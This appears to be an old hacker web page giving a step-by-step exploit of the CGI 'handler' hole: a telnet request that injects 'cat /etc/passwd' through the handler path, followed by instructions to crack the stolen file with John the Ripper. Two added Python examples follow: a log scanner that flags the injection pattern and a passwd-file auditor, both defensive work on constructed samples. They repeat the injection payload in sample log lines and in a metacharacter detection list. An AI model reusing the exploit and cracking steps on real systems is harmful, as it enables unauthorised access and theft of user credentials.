Handler and Cracking Passwd Files

This little page off my home page will teach you how to own a site with the old handler hole. It's basically really fucking easy, so if you want to exploit handler read below. If not, go back.

EXPLOITING HANDLER:

Type the following:

    # telnet siteto-own.org 80
    Trying ip.of.the.site....
    Connected to the.box.your.owning.
    Escape character is '^]'.
    GET /cgi-bin/handler/useless_shit; cat (hit tab) /etc/passwd|?data=Download

NOTE: remember to hit TAB between cat and /etc/passwd.

This does not always work, and it usually won't unless the box is either badly administered or an old system.

Now that you have the /etc/passwd file, you need to crack it. I suggest using John the Ripper. You can find it at www.rootshell.com.

If the passwd file is shadowed (you can tell it is shadowed if the password field of each line contains a * rather than random letters and numbers), you can't crack it, so if you find a shadowed passwd file move on. If it is unshadowed, you can carry on.

CRACK THE FILE:

Now that you have an unshadowed passwd file and John the Ripper installed, save the passwd file as a text file and move it into the John the Ripper directory. Then you're ready: type

    ./john nameoftext.txt

and it will go to work. Sometimes it takes DAYS to crack a passwd file, so be patient. Other than that, enjoy the user and password you will get.

-Liquid Illusion

Questions about this? E-mail me here.
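For the admin side of this: the request above leaves a very recognisable trace in the web server's access log, because a path handed to the handler CGI never legitimately contains shell metacharacters (`;`, `|`, backtick, or the TAB the page tells you to type). The following is an added example written for this page, not code from the page's author or from any web server project. It scans constructed Common Log Format lines (constructed here, not from any real server) and flags handler requests whose path carries a metacharacter, after URL-decoding `%09` and undoing the `\t` escape some log writers use for a raw tab.

```python
import re
from urllib.parse import unquote

# Common Log Format: host ident user [time] "METHOD PATH PROTO" status bytes
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Shell metacharacters that have no business inside a path passed to the handler CGI.
METACHARS = {";", "|", "\t", "`", "&", "\n"}

# Constructed sample log lines (not from a real server). The third and fourth carry the
# page's request shape: the third with the TAB URL-encoded as %09, the fourth with the
# raw TAB escaped as \t the way an access-log writer might record it.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Oct/1998:13:55:36 -0700] "GET /index.html HTTP/1.0" 200 2326',
    '10.0.0.7 - - [10/Oct/1998:13:56:01 -0700] "GET /cgi-bin/handler/doc.txt HTTP/1.0" 200 512',
    '10.0.0.9 - - [10/Oct/1998:13:57:12 -0700] "GET /cgi-bin/handler/x;%09cat%09/etc/passwd|?data=Download HTTP/1.0" 200 1450',
    '10.0.0.9 - - [10/Oct/1998:13:58:03 -0700] "GET /cgi-bin/handler/x;\\tcat\\t/etc/passwd| HTTP/1.0" 200 1450',
]


def is_handler_abuse(request_path):
    """True if the path targets the handler CGI and, once decoded, carries a shell
    metacharacter that would let part of the path be run as a command."""
    decoded = unquote(request_path)          # %09 -> TAB, %3B -> ';' and so on
    decoded = decoded.replace("\\t", "\t")   # undo the C-style escape a log writer may apply
    if "/cgi-bin/handler" not in decoded.lower():
        return False
    return any(ch in decoded for ch in METACHARS)


def scan_log(lines):
    """Return (client host, request path) for every log line that looks like handler abuse."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                          # not CLF, skip rather than guess
        parts = m.group("req").split(" ", 2)  # METHOD PATH PROTO
        if len(parts) < 2:
            continue
        path = parts[1]
        if is_handler_abuse(path):
            hits.append((m.group("host"), path))
    return hits


if __name__ == "__main__":
    for host, path in scan_log(SAMPLE_LOG):
        print(f"handler abuse from {host}: {path}")
```

Run against the sample, only the two requests from 10.0.0.9 are reported; the plain `/cgi-bin/handler/doc.txt` request is left alone because a clean path is exactly what handler was meant to serve.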
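The shadowed-or-not test the page describes by eye is easy to do by hand on your own box, which is the check an admin should run before anyone else does. This is an added example written for this page, not the author's code: it parses the traditional seven-field passwd format and sorts each account into shadowed/locked (the page's `*` marker, plus the `x` and `!` conventions later systems use for the same thing, which is an assumption about the file being audited), empty password, or a real hash sitting in the world-readable file. The sample file is constructed for the example.

```python
# Constructed /etc/passwd sample (not from a real system):
#   root   -> 'x'  : hash lives in /etc/shadow
#   daemon -> '*'  : the marker the page describes
#   bob    -> a real hash in the world-readable file (the case the page goes after)
#   alice  -> '!'  : locked account
#   lp     -> ''   : empty password field, no password needed at all
PASSWD_SAMPLE = """\
root:x:0:0:root:/root:/bin/sh
daemon:*:1:1:daemon:/usr/sbin:/bin/false
bob:Xy9fQ2lPz3mRs:1001:1001:Bob:/home/bob:/bin/sh
alice:!:1002:1002:Alice:/home/alice:/bin/sh
lp::7:7:lp:/var/spool/lpd:/bin/sh
# a comment line and a broken one follow
broken line without fields
"""


def classify_entry(line):
    """Return (user, kind) for one passwd line, or None if it is not a 7-field entry.
    kind is 'empty', 'shadowed_or_locked', or 'unshadowed_hash'."""
    fields = line.rstrip("\n").split(":")
    if len(fields) != 7:
        return None
    user, pw = fields[0], fields[1]
    if pw == "":
        return (user, "empty")
    # 'x' points at /etc/shadow; a leading '*' or '!' is a placeholder or a locked account,
    # none of which is a crackable hash.
    if pw == "x" or pw.startswith(("*", "!")):
        return (user, "shadowed_or_locked")
    return (user, "unshadowed_hash")


def audit_passwd(text):
    """Group account names by what their password field holds."""
    findings = {"empty": [], "shadowed_or_locked": [], "unshadowed_hash": []}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        result = classify_entry(line)
        if result is None:
            continue
        user, kind = result
        findings[kind].append(user)
    return findings


if __name__ == "__main__":
    report = audit_passwd(PASSWD_SAMPLE)
    for kind, users in report.items():
        print(f"{kind}: {', '.join(users) or '-'}")
```

Anything in `unshadowed_hash` is what the page is after, and anything in `empty` is worse than that; a clean box reports both lists empty.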